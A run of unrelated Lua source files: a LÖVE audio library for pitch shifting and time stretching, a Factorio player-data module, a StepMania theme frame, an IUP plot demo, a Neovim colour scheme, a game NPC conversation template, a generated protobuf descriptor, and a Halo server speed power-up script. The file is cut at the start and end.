"This library needs at least LÖVE 11.0.0 to function.")
assert(love.audio or love.sound,
"This library needs both love.audio and love.sound enabled to function.")
-- Constants
local SourceType = {['static'] = true, ['stream'] = true, ['queue'] = true}
local PitchUnit = {['ratio'] = true, ['semitones'] = true}
local TimeUnit = {['seconds'] = true, ['samples'] = true}
-- Barfing into the math library
math.sgn = function(x) return x<0 and -1.0 or 1.0 end
-- This is the default push-style API that may be overridden by a pull-style one.
local Queue = function(instance, buffer)
assert(instance._type == 'queue',
"Cannot queue up data manually to non-queueable sources.")
assert(instance.samplingRate == buffer:getSampleRate(),
"Buffer sampling rate mismatch.")
assert(instance.bitDepth == buffer:getBitDepth(),
"Buffer bit depth mismatch.")
assert(instance.channelCount == buffer:getChannelCount(),
"Buffer channel count mismatch.")
instance.buffer:release()
instance.buffer = love.sound.newSoundData(
buffer:getSampleCount(),
instance.samplingRate,
instance.bitDepth,
instance.channelCount)
-- May not be the most performant, but then again, the pull-style should be used anyway.
for i=0, buffer:getSampleCount()-1 do
instance.buffer:setSample(i, buffer:getSample(i))
end
instance.source:queue(instance.buffer)
return true
end
-- Defining generator functions that fill the internal Buffer object.
local Generator = {}
Generator.static = function(instance)
local p = instance.pointer
if instance._isPlaying then
for i=0, instance.bufferSize-1 do
-- Copy samplepoints to buffer.
local smp = 0.0
for ch=1, instance.channelCount do
smp = instance.data:getSample(math.floor(p), ch)
smp = math.min(math.max(smp, -1), 1)
instance.buffer:setSample(i, ch, smp)
end
-- Calculate next buffer-internal pointer.
p = (p + instance.innerOffset)
if instance.looping then
if instance.timeDilation >= 0 then
while p > instance.endpoint do
p = p - (instance.endpoint - instance.startpoint)
end
else
while p < instance.startpoint do
p = p + (instance.endpoint - instance.startpoint)
end
end
p = p % instance.data:getSampleCount()
else
if p >= instance.data:getSampleCount() or p < 0 then
-- Fill rest of the buffer with silence.
for j=i+1, instance.bufferSize-1 do
for ch=1, instance.channelCount do
instance.buffer:setSample(j, ch, 0.0)
end
end
instance:stop()
return
end
end
end
-- Calculate next buffer-external pointer.
if instance.looping then
instance.pointer = (instance.pointer - (instance.outerOffset * instance.bufferSize))
if instance.timeDilation >= 0 then
while instance.pointer > instance.endpoint do
instance.pointer = instance.pointer - (instance.endpoint - instance.startpoint)
end
else
while instance.pointer < instance.startpoint do
instance.pointer = instance.pointer + (instance.endpoint - instance.startpoint)
end
end
else
instance.pointer = (instance.pointer - (instance.outerOffset * instance.bufferSize))
end
instance.pointer = instance.pointer % instance.data:getSampleCount()
else
-- Fill buffer with silence.
for i=0, instance.bufferSize-1 do
for ch=1, instance.channelCount do
instance.buffer:setSample(i, ch, 0.0)
end
end
end
end
Generator.stream = function(instance) -- TODO
-- Probably need to use Decoder:seek; default buffer size is 16384 smps.
-- :isSeekable isn't exposed so we'll hope no one tries to open non-seekable vorbis files.
-- If pointer goes out of range of decoded samplepoints, we need to decode another batch.
end
Generator.queue = function(instance)
-- This actually just calls a pull-styled callback; deferring the heavy stuff to the user,
-- but only if the user redefined Source:queue to be a callback (i.e. the function's memory
-- address is different.)
if instance._type == 'queue' and instance.queue ~= Queue then
instance.queue(instance.buffer)
end
end
-- Makes pitch shifting and time stretching possible, more or less.
function calculatePlaybackCoefficients(instance)
instance.innerOffset = instance.pitchShift *
math.sgn(instance.timeDilation) *
instance.resampleRatio
instance.outerOffset = -instance.timeDilation *
math.abs(instance.resampleRatio)
end
-- Class
local ASource = {}
-- Enhance Source with additional functionality, some overloads, and some deprecations.
function ASource.update(instance, dt)
-- Maybe this could be shunted to a separate thread to make it more autonomous... it may have
-- more issues than it may be worth though.
while instance.source:getFreeBufferCount() > 0 do
Generator[instance._type](instance)
instance.source:queue(instance.buffer)
instance.source:play()
end
end
-- Deprecated
function ASource.setPitch(instance)
error("Function deprecated by Advanced Source Library; " ..
"for the same functionality, use :setResamplingRatio instead.")
end
function ASource.getPitch(instance)
error("Function deprecated by Advanced Source Library; " ..
"for the same functionality, use :getResamplingRatio instead.")
end
-- QSource related
function ASource.queue(instance, buffer)
return Queue(instance, buffer)
end
function ASource.getFreeBufferCount(instance)
return instance.source:getFreeBufferCount()
end
-- Copy-constructor
function ASource.clone(instance)
local clone = {}
for k,v in pairs(instance) do
clone[k] = v
end
-- Deep-copy specific fields that need it.
-- .data -> not an issue if it's a SoundData, if it's a Decoder, it is an issue.
if clone.data:type() == 'Decoder' then
if instance.orig then
clone.data = love.sound.newDecoder()
else
-- Decoder objects do have a clone method in the source code of löve, but it's not
-- exposed.
error("Original Source was created from a Decoder directly, can't clone that (atm).")
end
end
-- .source -> clone it neatly.
clone.source = instance.source:clone()
-- .buffer -> create a unique SoundData.
clone.buffer = love.sound.newSoundData(
clone.bufferSize,
clone.samplingRate,
clone.bitDepth,
clone.channelCount)
-- Set up more internals.
calculatePlaybackCoefficients(clone)
setmetatable(clone, mtASource)
return clone
end
-- State manipulation
function ASource.play(instance)
instance._isPlaying = true
return true
end
function ASource.pause(instance)
instance._isPlaying = false
return true
end
function ASource.rewind(instance)
instance.pointer = instance.timeDilation >= 0 and 0 or instance.data:getSampleCount()-1
return true
end
function ASource.stop(instance)
instance:pause()
instance:rewind()
return true
end
function ASource.isPlaying(instance)
return instance._isPlaying
end
function ASource.seek(instance, position, unit)
assert(instance._type ~= 'queue',
"Can't seek Queuable sources.")
if instance._type == 'static' then
if unit == 'samples' then
assert(position > 0 and position < instance.data:getSampleCount(),
"Attempted to seek outside of data range.")
instance.pointer = position
else
assert(position > 0 and position < instance.data:getDuration(),
"Attempted to seek outside of data range.")
instance.pointer = math.floor(position * instance.samplingRate)
end
elseif instance._type == 'stream' then
if unit == 'samples' then
assert(position > 0 and position < instance.data:getDuration() * instance.samplingRate,
"Attempted to seek outside of data range.")
instance.pointer = position
else
assert(position > 0 and position < instance.data:getDuration(),
"Attempted to seek outside of data range.")
instance.pointer = math.floor(position * instance.samplingRate)
end
end
end
function ASource.tell(instance, position, unit)
assert(TimeUnit[unit],
"Unsupported TimeUnit: " .. tostring(unit))
-- This works with queueable sources as well; it probably did work the same way before, too.
if unit == 'samples' then
return instance.pointer
elseif unit == 'seconds' then
return instance.pointer / instance.samplingRate
end
end
-- Looping related
function ASource.setLooping(instance, state)
assert(instance._type ~= 'queue',
"Can't set looping behaviour on Queuable sources.")
assert(type(state) == 'boolean',
"Parameter must be boolean.")
instance.looping = state
end
function ASource.isLooping(instance)
assert(instance._type ~= 'queue',
"Can't query looping behaviour on Queuable sources.")
return instance.looping
end
function ASource.setLoopPoints(instance, startpoint, endpoint)
assert(instance._type ~= 'queue',
"Can't set loop points on Queuable sources.")
assert(type(startpoint) == 'number',
"Given start point parameter not a number.")
assert(type(endpoint) == 'number',
"Given end point parameter not a number.")
assert(startpoint < endpoint,
"Given startpoint parameter must be less than endpoint parameter.")
assert(startpoint>0,
"Given startpoint parameter must be larger than zero.")
assert(endpoint>0,
"Given endpoint parameter must be larger than zero.")
-- Also assert based on actual audio file loaded... both with static and stream sources.
if instance._type == 'static' then
assert(startpoint < instance.data:getSampleCount(),
"Given startpoint exceeds length of SoundData.")
assert(endpoint < instance.data:getSampleCount(),
"Given endpoint exceeds length of SoundData.")
elseif instance._type == 'stream' then
assert(startpoint < instance.data:getDuration() * instance.data:getSampleRate(),
"Given startpoint exceeds length reported by Decoder.")
assert(endpoint < instance.data:getDuration() * instance.data:getSampleRate(),
"Given endpoint exceeds length reported by Decoder.")
end
instance.startpoint = startpoint
instance.endpoint = endpoint
end
function ASource.getLoopPoints(instance)
assert(instance._type ~= 'queue',
"Can't query loop points from Queuable sources.")
return instance.startpoint, instance.endpoint
end
-- Format getters
function ASource.getBitRate(instance)
return instance.bitDepth
end
function ASource.getChannelCount(instance)
return instance.channelCount
end
function ASource.getDuration(instance, unit)
assert(TimeUnit[unit],
"Unsupported TimeUnit: " .. tostring(unit))
if instance._type == 'static' then
if unit == 'samples' then
return instance.data:getSampleCount()
elseif unit == 'seconds' then
return instance.data:getDuration()
end
elseif instance._type == 'stream' then
if unit == 'samples' then
return instance.data:getDuration() * instance.samplingRate
elseif unit == 'seconds' then
return instance.data:getDuration()
end
end
-- Queue sources don't support this since they could go on forever, theoretically;
-- but löve default behaviour returns -1 here for them, so we should too.
return -1
end
function ASource.getSampleRate(instance)
return instance.samplingRate
end
function ASource.getType(instance)
return instance._type
end
-- Time-domain manipulation
function ASource.getBufferSize(instance)
return instance.bufferSize
end
function ASource.setBufferSize(instance, samplepoints)
assert(type(samplepoints) == 'number' and
samplepoints > 0 and samplepoints == math.floor(samplepoints),
"Buffer size must be given as a positive nonzero integer.")
instance.bufferSize = samplepoints
instance.buffer = love.sound.newSoundData(
instance.bufferSize,
instance.samplingRate,
instance.bitDepth,
instance.channelCount)
print("Set buffer size to " .. instance.bufferSize)
end
function ASource.getPitchShift(instance, unit)
if unit == nil then unit = 'ratio' end
assert(PitchUnit[unit],
("Pitch shift unit %s unsupported."):format(tostring(unit)))
if unit == 'ratio' then
return instance.pitchShift
elseif unit == 'semitones' then
return instance.pitchShiftSt
end
end
function ASource.setPitchShift(instance, amount, unit)
-- range: [0,)
-- shift amount saved internally
-- amount sets first value only
-- needs special exception for second value logic
--[[
ok 0.0, N/A -> 0.0, 0.0 * buffer.size -- -inf semitones (true stop) -- not possible.
----------------------------------------
ok 0.5, N/A -> 0.5, -any * buffer.size -- -12 semitones forwards
ok 0.75, N/A -> 0.75, -any * buffer.size -- -~6 semitones forwards
ok 1.0, N/A -> 1.0, -any * buffer.size -- +-0 semitones forwards
ok 1.5, N/A -> 1.5, -any * buffer.size -- +~6 semitones forwards
ok 2.0, N/A -> 2.0, -any * buffer.size -- +12 semitones forwards
----------------------------------------
ok 0.5, N/A -> 0.5, +any * buffer.size -- -12 semitones backwards
ok 0.75, N/A -> 0.75, +any * buffer.size -- -~6 semitones backwards
ok 1.0, N/A -> 1.0, +any * buffer.size -- +-0 semitones backwards
ok 1.5, N/A -> 1.5, +any * buffer.size -- +~6 semitones backwards
ok 2.0, N/A -> 2.0, +any * buffer.size -- +12 semitones backwards
--]]
assert(type(amount) == 'number',
"Pitch shifting amount must be a number.")
if unit == nil then unit = 'ratio' end
assert(PitchUnit[unit],
("Pitch shift unit %s unsupported."):format(tostring(unit)))
if (unit == 'ratio') and (amount <= 0) then
error("Pitch shift amount can't be lower or equal to 0.")
end
instance.pitchShift = (unit == 'ratio') and
amount or 2^(amount/12)
instance.pitchShiftSt = (unit == 'semitones') and
amount or (math.log(amount)/math.log(2))*12
calculatePlaybackCoefficients(instance)
end
function ASource.getResamplingRatio(instance)
return instance.resampleRatio
end
function ASource.setResamplingRatio(instance, ratio)
-- range: (,)
-- resampling rate saved internally
-- rate multiplies both values
--[[
ok 2.0 -> 2.0, -2.0 * buffer.size -- 2x resample forwards ( 200%, +12st)
ok 1.5 -> 1.5, -1.5 * buffer.size -- 3/2x resample forwards ( 150%, +6st)
ok 1.0 -> 1.0, -1.0 * buffer.size -- 1x resample forwards ( 100%, 0st)
ok 0.75 -> 0.75, -0.75 * buffer.size -- 3/4x resample forwards ( 75%, -6st)
ok 0.5 -> 0.5, -0.5 * buffer.size -- 1/2x resample forwards ( 50%, -12st)
ok 0.25 -> 0.25, -0.25 * buffer.size -- 1/4x resample forwards ( 25%, -24st)
ok 0.0 -> 0.0, 0.0 * buffer.size -- 0x resample playback (true stop)
ok 0.25 -> -0.25, 0.25 * buffer.size -- 1/4x resample backwards ( -25%, -24st)
ok 0.5 -> -0.5, 0.5 * buffer.size -- 1/2x resample backwards ( -50%, -12st)
ok 0.75 -> -0.75, 0.75 * buffer.size -- 3/4x resample backwards ( -75%, -6st)
ok 1.0 -> -1.0, 1.0 * buffer.size -- 1x resample backwards (-100%, 0st)
ok 1.5 -> -1.5, 1.5 * buffer.size -- 3/2x resample backwards (-150%, +6st)
ok 2.0 -> -2.0, 2.0 * buffer.size -- 2x resample backwards (-200%, +12st)
--]]
assert(type(ratio) == 'number',
"Resampling ratio must be a number.")
instance.resampleRatio = ratio
calculatePlaybackCoefficients(instance)
end
function ASource.getTimeStretch(instance)
return instance.timeDilation
end
function ASource.setTimeStretch(instance, ratio)
-- range: (,)
-- stretch amount saved internally
-- amount sets second value only
-- amount's sign applied to first value (* amount>=0 and 1.0 or -1.0)
-- above works for 0 as well
--[[
ok N/A, 2.0 -> +any, -2.0 * buffer.size -- 200% playback forwards
ok N/A, 1.5 -> +any, -1.5 * buffer.size -- 150% playback forwards
ok N/A, 1.0 -> +any, -1.0 * buffer.size -- 100% playback forwards
ok N/A, 0.75 -> +any, -0.75 * buffer.size -- 75% playback forwards
ok N/A, 0.5 -> +any, -0.5 * buffer.size -- 50% playback forwards
ok N/A, 0.25 -> +any, -0.25 * buffer.size -- 25% playback forwards
ok N/A, 0.0 -> +any, 0.0 * buffer.size -- 0% playback forwards(stutter)
ok N/A, 0.0 -> -any, 0.0 * buffer.size -- 0% playback backwards(stutter)
ok N/A, -0.25 -> -any, 0.25 * buffer.size -- 25% playback backwards
ok N/A, -0.5 -> -any, 0.5 * buffer.size -- 50% playback backwards
ok N/A, -0.75 -> -any, 0.75 * buffer.size -- 75% playback backwards
ok N/A, -1.0 -> -any, 1.0 * buffer.size -- 100% playback backwards
ok N/A, -1.5 -> -any, 1.5 * buffer.size -- 150% playback backwards
ok N/A, -2.0 -> -any, 2.0 * buffer.size -- 200% playback backwards
--]]
assert(type(ratio) == 'number',
"Time stretching ratio must be a number.")
instance.timeDilation = ratio
calculatePlaybackCoefficients(instance)
end
-- Effects related
function ASource.getEffect(instance, ...)
return instance.source:getEffect(...)
end
function ASource.setEffect(instance, ...)
return instance.source:setEffect(...)
end
function ASource.getFilter(instance, ...)
return instance.source:getFilter(...)
end
function ASource.setFilter(instance, ...)
return instance.source:setFilter(...)
end
-- Spatial functionality
function ASource.getAirAbsorption(instance, ...)
return instance.source:getAirAbsorption(...)
end
function ASource.setAirAbsorption(instance, ...)
return instance.source:setAirAbsorption(...)
end
function ASource.getAttenuationDistances(instance, ...)
return instance.source:getAttenuationDistances(...)
end
function ASource.setAttenuationDistances(instance, ...)
return instance.source:setAttenuationDistances(...)
end
function ASource.getCone(instance, ...)
return instance.source:getCone(...)
end
function ASource.setCone(instance, ...)
return instance.source:setCone(...)
end
function ASource.getDirection(instance, ...)
return instance.source:getDirection(...)
end
function ASource.setDirection(instance, ...)
return instance.source:setDirection(...)
end
function ASource.getPosition(instance, ...)
return instance.source:getPosition(...)
end
function ASource.setPosition(instance, ...)
return instance.source:setPosition(...)
end
function ASource.getRolloff(instance, ...)
return instance.source:getRolloff(...)
end
function ASource.setRolloff(instance, ...)
return instance.source:setRolloff(...)
end
function ASource.getVelocity(instance, ...)
return instance.source:getVelocity(...)
end
function ASource.setVelocity(instance, ...)
return instance.source:setVelocity(...)
end
function ASource.isRelative(instance, ...)
return instance.source:isRelative(...)
end
function ASource.setRelative(instance, ...)
return instance.source:setRelative(...)
end
function ASource.getVolume(instance, ...)
return instance.source:getVolume(...)
end
function ASource.setVolume(instance, ...)
return instance.source:setVolume(...)
end
function ASource.getVolumeLimits(instance, ...)
return instance.source:getVolumeLimits(...)
end
function ASource.setVolumeLimits(instance, ...)
return instance.source:setVolumeLimits(...)
end
-- Object super overrides
function ASource.release(instance)
-- Clean up the whole ASource, not just the internal Source object.
if instance.data then instance.data:release() end
instance.buffer:release()
instance.source:release()
for k,v in pairs(instance) do k = nil end
end
function ASource.type(instance)
return 'ASource'
end
function ASource.typeOf(instance, type)
if type == 'ASource' or type == 'Source' or type == 'Object' then
return true
end
return false
end
---------------------------------------------------------------------------------------------------
local mtASource = {__index = function(instance, method)
if ASource[method] then
return ASource[method]
else
if instance.source[method] then
return instance.source[method]
end
end
end}
-- Generic constructor:
-- - SourceType type, String path
-- - SourceType type, File file
-- - Decoder decoder
-- - SoundData sounddata
-- - Number samplerate, Number bitdepth, Number channels, Number buffercount
new = function(a, b, c, d)
-- Create instance.
local asource = {}
-- Set initial values.
asource.orig = nil -- used for cloning (deep-copying) internal SD or DC objects...
asource.type = nil
asource._isPlaying = false
asource.bitDepth = 8
asource.bufferCount = 8 -- OALS internal buffer count; unrelated to most things here.
asource.channelCount = 1
asource.samplingRate = 8000
asource.bufferSize = 2048 -- Seems optimal for time stretching w/ a samp.rate of 44.1kHz.
asource.pitchShift = 1 -- 1 means no pitch modification.
asource.pitchShiftSt = 0 -- 0 means no semitone offset.
asource.resampleRatio = 1 -- 1 means regular rate.
asource.timeDilation = 1 -- 1 means regular forward playback.
asource.innerOffset = 1 -- Rate of samplepoint advancement in one buffer.
asource.outerOffset = -1 -- Rate of buffer advancement.
asource.pointer = 0 -- Samplepoint offset into the full track.
asource.looping = false
asource.startpoint = 0 -- In samplepoints.
asource.endpoint = 0 -- In samplepoints.
-- Handle specific cases just as how other Sources are handled.
if type(a) == 'string' then
assert(SourceType[a],
("Given SourceType parameter %s not supported"):format(tostring(a)))
if (type(b) == 'string') or
(b.type and (b:type() == 'File' or b:type() == 'DroppedFile')) then
if a == 'static' then
asource._type = 'static'
asource.data = love.sound.newSoundData(b)
asource.orig = b
elseif b == 'stream' then
asource._type = 'stream'
asource.data = love.sound.newDecoder(b)
asource.orig = b
else
error("Queueable Sources can't be created from file or filepath.")
end
end
elseif a.type and a:type() == 'SoundData' then
asource._type = 'static'
asource.data = a
asource.orig = asource.data
elseif a.type and a:type() == 'Decoder' then
asource._type = 'stream'
asource.data = a
asource.orig = nil
elseif type(a) == 'number' then
asource._type = 'queue'
asource.orig = nil
else
error(("Given parameter %s not suppoted"):format(tostring(a)))
end
-- Store data parameters, if extant.
if asource.data then
asource.samplingRate = asource.data:getSampleRate()
asource.bitDepth = asource.data:getBitDepth()
asource.channelCount = asource.data:getChannelCount()
-- Try setting the default loop endpoint to the end of the waveform.
if asource._type == 'static' then
asource.endpoint = asource.data:getSampleCount()
elseif asource._type == 'stream' then
asource.endpoint = asource.data:getDuration() * asource.samplingRate
end
end
-- Create internal Qsource.
asource.source = love.audio.newQueueableSource(
asource.samplingRate,
asource.bitDepth,
asource.channelCount,
asource.bufferCount)
-- Create internal Buffer.
asource.buffer = love.sound.newSoundData(
asource.bufferSize,
asource.samplingRate,
asource.bitDepth,
asource.channelCount)
-- Set up more internals.
calculatePlaybackCoefficients(asource)
-- Make this work more or less like a regular source.
setmetatable(asource, mtASource)
--------------
return asource
end
-- Successfully loaded library, make it available both ways.
love.audio.newAdvancedSource = new
return new |
--- Player global creation
-- Requiring this module will automatically create a global.players[index] for all new players using stdlib's Event system
-- @module Player
-- @usage local Player = require 'stdlib/event/player'
-- -- The fist time this is required it will register player creation events
require('stdlib/event/event')
require('stdlib/table')
local fail_if_missing = require 'stdlib/core'['fail_if_missing']
local Player = {}
--Default data for the player
local function new(player_index)
local obj = {
index = player_index,
name = game.players[player_index].name,
}
return obj
end
--Print any messages in the queue.
local function check_message_queue(player_index)
if global._mess_queue then
for _, msg in pairs(global._mess_queue) do
game.players[player_index].print(msg)
end
global._mess_queue = nil
end
end
--- Get the game.players[index] and global.players[index] objects, create the global.players[index] object if it doesn't exist.
-- @tparam number index the player index to get data for
-- @treturn LuaPlayer
-- @treturn table The players global data
-- @usage local Player = require 'stdlib/event/player'
-- local player, player_data = Player.get(event.player_index)
function Player.get(index)
fail_if_missing(index, 'Missing index to retrieve')
return game.players[index], global.players[index] or (Player.init(index) and global.players[index])
end
--- Merge a copy of the passed data to all players in global.players
-- @tparam table data a table containing variables to merge
-- @usage local data = {a = 'abc', b= 'def'}
-- Player.add_data_all(data)
function Player.add_data_all(data)
local pdata = global.players
table.each(pdata, function(v) table.merge(v, table.deepcopy(data)) end)
end
--- Init or re-init a player or players,
-- @tparam[opt] number|table event table or a number containing player_index
-- @tparam[opt=false] boolean overwrite the player data
function Player.init(event, overwrite)
-- Turn it into a valid event table
event = event and type(event) == "number" and {player_index = event, name = 99999} or event
global.players = global.players or {}
-- If event is not nil than we are working with a single player
if event and event.name >= 0 and event.player_index then
if not game.players[event.player_index] then error("Invalid Player") end
if not global.players[event.player_index] or (global.players[event.player_index] and overwrite) then
global.players[event.player_index] = new(event.player_index)
-- Does this player have any messages queued up?
check_message_queue(event.player_index)
end
else
for index in pairs(game.players) do
if not global.players[index] or (global.players[index] and overwrite) then
global.players[index] = new(index)
end
end
end
end
Event.register(defines.events.on_player_created, Player.init)
Event.register(Event.core_events.init, Player.init)
return Player
|
return {
require = require
}
|
-- This needs to be an ActorFrame because children will want to load the base and merge their own elements into the table.
t = Def.ActorFrame {};
--t[#t+1] = StandardDecorationFromFile( "LeftFrame", "LeftFrame" );
--t[#t+1] = StandardDecorationFromFile( "RightFrame", "RightFrame" );
t[#t+1] = StandardDecorationFromFile( "Header", "Header" );
t[#t+1] = StandardDecorationFromFile( "Footer", "Footer" );
t[#t+1] = StandardDecorationFromFileOptional( "Help", "Help" );
t[#t+1] = StandardDecorationFromFileOptional( "StyleIcon", "StyleIcon" );
t[#t+1] = StandardDecorationFromFileOptional( "StageFrame", "StageFrame" );
t[#t+1] = StandardDecorationFromFileOptional( "StageDisplay", "StageDisplay" );
return t;
|
require( "iuplua" )
require( "iuplua_pplot" )
plot = iup.pplot{
TITLE = "Simple Line",
MARGINBOTTOM="65",
MARGINLEFT="65",
AXS_XLABEL="X",
AXS_YLABEL="Y",
LEGENDSHOW="YES",
LEGENDPOS="TOPLEFT",
}
iup.PPlotBegin(plot, 0)
iup.PPlotAdd(plot, 0, 0)
iup.PPlotAdd(plot, 1, 1)
iup.PPlotEnd(plot)
d = iup.dialog{plot, size="200x100", title="PPlot"}
d:show()
if (iup.MainLoopLevel()==0) then
iup.MainLoop()
end
|
local colors = require("cobalt2.utils").colors
local styles = require("cobalt2.utils").styles
local Group = require("cobalt2.utils").Group
---------------------------------------------------------------------------------
-- leap.nvim --
---------------------------------------------------------------------------------
Group.new("LeapMatch", colors.dark_pink, nil, nil)
Group.new("LeapLabelPrimary", colors.pink, nil, styles.italic)
Group.new("LeapLabelSecondary", colors.red, nil, styles.underline)
Group.new("LeapBackdrop", colors.dark_grey, nil, nil)
|
local template = {}
template.html = ""
local file = io.open("html/template.html", "rb")
local i
for i in file:lines() do
template.html = template.html .. i
end
file:close()
return template |
biogenic_construction_ConversationTemplate = ConvoTemplate:new {
initialScreen = "",
templateType = "Lua",
luaClassHandler = "BiogenicConstructionConvoHandler",
screens = {}
}
intro_assistant_done = ConvoScreen:new {
id = "intro_assistant_done",
leftDialog = "@conversation/biogenic_construction:s_575de8f1", -- Thanks again for killing those spiders. I'm getting out of here as soon as the way is clear.
stopConversation = "false",
options = {}
}
biogenic_construction_ConversationTemplate:addScreen(intro_assistant_done);
intro_check_engineering = ConvoScreen:new {
id = "intro_check_engineering",
leftDialog = "@conversation/biogenic_construction:s_dc2d689c", -- Thanks again for killing those spiders. If you need to get to the engineering area, the code 51892 will get you in.
stopConversation = "false",
options = {}
}
biogenic_construction_ConversationTemplate:addScreen(intro_check_engineering);
intro = ConvoScreen:new {
id = "intro",
leftDialog = "@conversation/biogenic_construction:s_1df6adfc", -- Thank goodness you got here in time! That spider was going to kill me. I thought for sure I was a goner. How can I ever repay you?
stopConversation = "false",
options = {
{"@conversation/biogenic_construction:s_e4b06f76","get_wits_back"}, -- There's no need. I'm glad you're alright.
{"@conversation/biogenic_construction:s_355bc632","dont_have_much"}, -- I'm sure you'll think of some way.
{"@conversation/biogenic_construction:s_355bc632","excavating_passage"}, -- What were you doing in here anyway?
{"@conversation/biogenic_construction:s_457410bd","getting_out_too"} -- No problem. Good-bye.
}
}
biogenic_construction_ConversationTemplate:addScreen(intro);
get_wits_back = ConvoScreen:new {
id = "get_wits_back",
leftDialog = "@conversation/biogenic_construction:s_fc129e0e", -- Well I'm only interested in getting out of here now. I'll do that as soon as I get my wits back.
stopConversation = "false",
options = {
--{"@conversation/biogenic_construction:s_5fe23666","bye_good_luck"}, -- OK. Good-bye then.
}
}
biogenic_construction_ConversationTemplate:addScreen(get_wits_back);
dont_have_much = ConvoScreen:new {
id = "dont_have_much",
leftDialog = "@conversation/biogenic_construction:s_eb771a95", -- Actually, I don't have much to give you. Perhaps I'll think of something later.
stopConversation = "false",
options = {
--{"@conversation/biogenic_construction:s_5fe23666","bye_good_luck"}, -- OK. Good-bye then.
}
}
biogenic_construction_ConversationTemplate:addScreen(dont_have_much);
excavating_passage = ConvoScreen:new {
id = "excavating_passage",
leftDialog = "@conversation/biogenic_construction:s_75118515", -- I was working on excavating this passage when the earthquake hit. Not long after, the spiders attacked. Now I just want to get out of here.
stopConversation = "false",
options = {
--{"@conversation/biogenic_construction:s_5fe23666","bye_good_luck"}, -- OK. Good-bye then.
}
}
biogenic_construction_ConversationTemplate:addScreen(excavating_passage);
getting_out_too = ConvoScreen:new {
id = "getting_out_too",
leftDialog = "@conversation/biogenic_construction:s_c30b797d", -- Yea, I'm getting out of here too.
stopConversation = "false",
options = {
--{"@conversation/biogenic_construction:s_5fe23666","bye_good_luck"}, -- OK. Good-bye then.
}
}
biogenic_construction_ConversationTemplate:addScreen(getting_out_too);
bye_good_luck = ConvoScreen:new {
id = "bye_good_luck",
leftDialog = "@conversation/biogenic_construction:s_c1d58076", -- Good-bye, and good luck!
stopConversation = "false",
options = {}
}
biogenic_construction_ConversationTemplate:addScreen(bye_good_luck);
bye_check_engineering = ConvoScreen:new {
id = "bye_check_engineering",
leftDialog = "@conversation/biogenic_construction:s_67f9970", -- If you have a chance, you might want to go check out the main engineering area. It looks like the power core might be damaged or offline. If the door is locked, the code 51892 will get you in. Good-bye, and good luck!
stopConversation = "false",
options = {}
}
biogenic_construction_ConversationTemplate:addScreen(bye_check_engineering);
addConversationTemplate("biogenic_construction_ConversationTemplate", biogenic_construction_ConversationTemplate);
|
-- Generated By protoc-gen-lua Do not Edit
local protobuf = require "protobuf"
module('BceMergeProp_pb', package.seeall)
local BCEMERGEPROP = protobuf.Descriptor();
local BCEMERGEPROP_SRCPEW_FIELD = protobuf.FieldDescriptor();
local BCEMERGEPROP_DSTPEW_FIELD = protobuf.FieldDescriptor();
BCEMERGEPROP_SRCPEW_FIELD.name = "srcPew"
BCEMERGEPROP_SRCPEW_FIELD.full_name = ".com.xinqihd.sns.gameserver.proto.BceMergeProp.srcPew"
BCEMERGEPROP_SRCPEW_FIELD.number = 1
BCEMERGEPROP_SRCPEW_FIELD.index = 0
BCEMERGEPROP_SRCPEW_FIELD.label = 2
BCEMERGEPROP_SRCPEW_FIELD.has_default_value = false
BCEMERGEPROP_SRCPEW_FIELD.default_value = 0
BCEMERGEPROP_SRCPEW_FIELD.type = 5
BCEMERGEPROP_SRCPEW_FIELD.cpp_type = 1
BCEMERGEPROP_DSTPEW_FIELD.name = "dstPew"
BCEMERGEPROP_DSTPEW_FIELD.full_name = ".com.xinqihd.sns.gameserver.proto.BceMergeProp.dstPew"
BCEMERGEPROP_DSTPEW_FIELD.number = 2
BCEMERGEPROP_DSTPEW_FIELD.index = 1
BCEMERGEPROP_DSTPEW_FIELD.label = 2
BCEMERGEPROP_DSTPEW_FIELD.has_default_value = false
BCEMERGEPROP_DSTPEW_FIELD.default_value = 0
BCEMERGEPROP_DSTPEW_FIELD.type = 5
BCEMERGEPROP_DSTPEW_FIELD.cpp_type = 1
BCEMERGEPROP.name = "BceMergeProp"
BCEMERGEPROP.full_name = ".com.xinqihd.sns.gameserver.proto.BceMergeProp"
BCEMERGEPROP.nested_types = {}
BCEMERGEPROP.enum_types = {}
BCEMERGEPROP.fields = {BCEMERGEPROP_SRCPEW_FIELD, BCEMERGEPROP_DSTPEW_FIELD}
BCEMERGEPROP.is_extendable = false
BCEMERGEPROP.extensions = {}
BceMergeProp = protobuf.Message(BCEMERGEPROP)
_G.BCEMERGEPROP_PB_BCEMERGEPROP = BCEMERGEPROP
|
--[[
------------------------------------
Description: HPC Speed PowerUp, Phasor V2+
Copyright (c) 2016-2018
* Author: Jericho Crosby
* IGN: Chalwk
* Written and Created by Jericho Crosby
-----------------------------------
]]--
-- When a player interacts with a camouflage, this script will give them a temporary speed boost.
function OnScriptUnload()
end
function GetRequiredVersion()
return 200
end
function OnScriptLoad(processId, game, persistent)
end
EQUIPMENT = { }
EQUIPMENT_TAGS = { }
EQUIPMENT[1] = { "powerups\\active camouflage" }
SPEED_POWERUP = (2) -- Scale: Amount of speed to give the player: (default: 1)
SPEED_POWERUP_DURATION = (10) -- Time the speed boosts lasts. (in seconds)
DB = " has been given a speed boost"
RESET = "'s Speed Boost was reset!"
function OnNewGame(map)
for k, v in pairs(EQUIPMENT) do
local TAG_ID = gettagid("eqip", v[1])
table.insert(EQUIPMENT_TAGS, TAG_ID)
end
Camouflage_Tab_ID = gettagid("eqip", "powerups\\active camouflage")
end
function ApplySpeed(player)
if player then
setspeed(player, tonumber(SPEED_POWERUP))
registertimer(SPEED_POWERUP_DURATION * (1000), "ResetSpeed", player)
-- 1000 milliseconds (1 second increments)
privatesay(player, "Speed Boost!", false)
-- returning false to disable the server prefix!
-- local name = getname(player)
-- respond(getname(player) .. DB)
end
end
function BeginCountDown(id, count)
if count == 10 then
local name = getname(player)
say("POWERUP RESET!", false)
respond(getname(player) .. RESET)
return false
else
say("Resetting Powerup in: (" .. 10 - count .. ")", false)
hprintf("Resetting Powerup in: " .. 10 - count .. ")")
return true
end
end
function ResetSpeed(id, count, player)
setspeed(player, (1.08))
privatesay(player, "Speed Reset!", false)
-- Returning false to disable the server prefix!
local name = getname(player)
hprintf(name .. "'s Speed Boost was rest!")
return (0)
-- Do Not Touch
end
function OnObjectInteraction(player, objId, MapID)
for i = (0), #EQUIPMENT_TAGS do
if MapID == EQUIPMENT_TAGS[i] then
if MapID == Camouflage_Tab_ID then
-- Camo MapID
ApplySpeed(player)
